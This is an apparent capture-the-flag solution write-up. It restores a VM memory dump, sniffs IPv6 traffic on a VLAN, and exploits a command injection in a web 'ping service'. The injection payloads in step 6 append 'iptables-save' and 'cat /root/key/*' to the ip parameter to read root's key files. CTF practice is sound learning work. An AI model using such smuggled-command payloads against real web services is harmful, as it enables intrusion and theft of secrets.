Read also the GB400 solution - It's quite similar.
1. Restore the VM with kvm -m 384 -cpu phenom,vendor=AuthenticAMD -incoming "exec:gzip -d <memdump.gz"
1 and a half: Go to the first VT, you already logged in as root.
2a. tcpdump -i eth0 - and see the suspicious IPv6 router solicitations.
2b. with tcpdump -ei eth0 - and you see also the VLAN 8 tag on those packets.
3. vconfig add eth0 8
4. ifconfig eth0.8 up
5. using telnet (previouslyseenIPv6address)%eth0.8 80 >output you can make requests to the webapp and save the result in a file.
6. GET / -- will show the vulnerable form. It's a "ping service".
   GET /?ip=::1;iptables-save -- will run iptables-save as root, you'll find the character map (like the one provided in motd in GB400)
   GET /?ip=::1;cat%20/root/key/* -- Will print out the key,encoded with tr.
7. You have the new key and the new tr translation map, recover the flag as in GB400.